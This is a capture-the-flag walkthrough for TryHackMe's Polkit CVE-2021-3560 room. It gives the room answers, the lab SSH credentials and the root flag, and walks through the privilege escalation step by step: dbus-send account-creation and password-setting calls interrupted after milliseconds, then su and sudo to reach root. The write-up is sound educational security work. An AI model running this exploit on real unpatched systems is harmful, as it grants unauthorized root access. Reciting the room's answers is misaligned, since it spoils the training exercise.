TryHackMe: Polkit: CVE-2021–3560 Walkthrough.
You can access the room through this link: https://tryhackme.com/room/polkit
Task 1 :- Info Deploy
Click the green “Start Machine” button to deploy the machine! → No answer needed.
Task 2 :- Info Important! About Dynamic Flags
What is the URL of the website you should submit dynamic flags to? → https://flag.muir.land/
Task 3 :- Tutorial Background
Please read the background for more and good knowledge.
In what version of Ubuntu’s policykit-1 is CVE-2021–3560 patched? → 0.105–26ubuntu1.1
What program can we use to run commands as other users via polkit? → pkexec
Task 4 :- Tutorial Exploitation Process
You must read the information of this task. → No answer needed
Task 5 :- Practical Do it for yourself!
if you would like to SSH into the target machine, the credentials are:
• Username: tryhackme
• Password: TryHackMe123!
First, let’s look at the dbus messages we’ll need to send:
tryhackme@polkit:~$ dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:yoyohoney string:”Honey Singh” int32:1
We need a password hash here, so let’s generate a Sha512Crypt hash for our chosen password (Expl01ted):
tryhackme@polkit:~$ openssl passwd -6 Expl01ted
$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.
Our second dbus message will set a password for the new account:
tryhackme@polkit:~$ dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:’$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.’ string:’Ask the pentester’
We need to send the dbus message, then kill it about halfway through:
tryhackme@polkit:~$ dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:”Pentester Account” int32:1 & sleep 0.005s; kill $!
Now let’s finish this! 5 milliseconds worked last time, so it should work here too:
tryhackme@polkit:~$ dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:’$6$gtjmG63Uxa5SIVIA$RXtnqUAbCWLjjLgPAW0hrJ8J4DN1OAUcr5dwB7ABI3CvKpibN.pN.x1JZG1LIhKWQXaaVonnyDHVM7bjcx/0f.’ string:’Ask the pentester’ & sleep 0.005s; kill $!
tryhackme@polkit:~$ su attacker
Password:Expl01ted
attacker@polkit:/home/tryhackme$ sudo -l
[sudo] password for attacker:Expl01ted
-S, — stdin read password from standard input
attacker@polkit:/home/tryhackme$ sudo -s
root@polkit:/home/tryhackme# whoami
root
root@polkit:/home/tryhackme# cat /root/root.txt
Bijaa2pyBVg=-4w64kzT+bxfUR+c9-s7RE1MbSF8bh4QMI/PFNvB7P00ADqjGV88dskBFvRN/pDzE6rDDlvg==
Yeah, we got the flag wait what but its t00 long. Now we have to submit this flag to here .
You will be asked to submit three pieces of information:
- Your username. It is very important that this is identical to your TryHackMe username!
- The box code. In most instances this will be the same as the room code. For this room the code will be: polkit
- The flag
And you get the real flag to submit.
Note :- Always terminate the machine you deployed in this room.
Thanks for reading hope you guys like. Post your questions in the comment section below!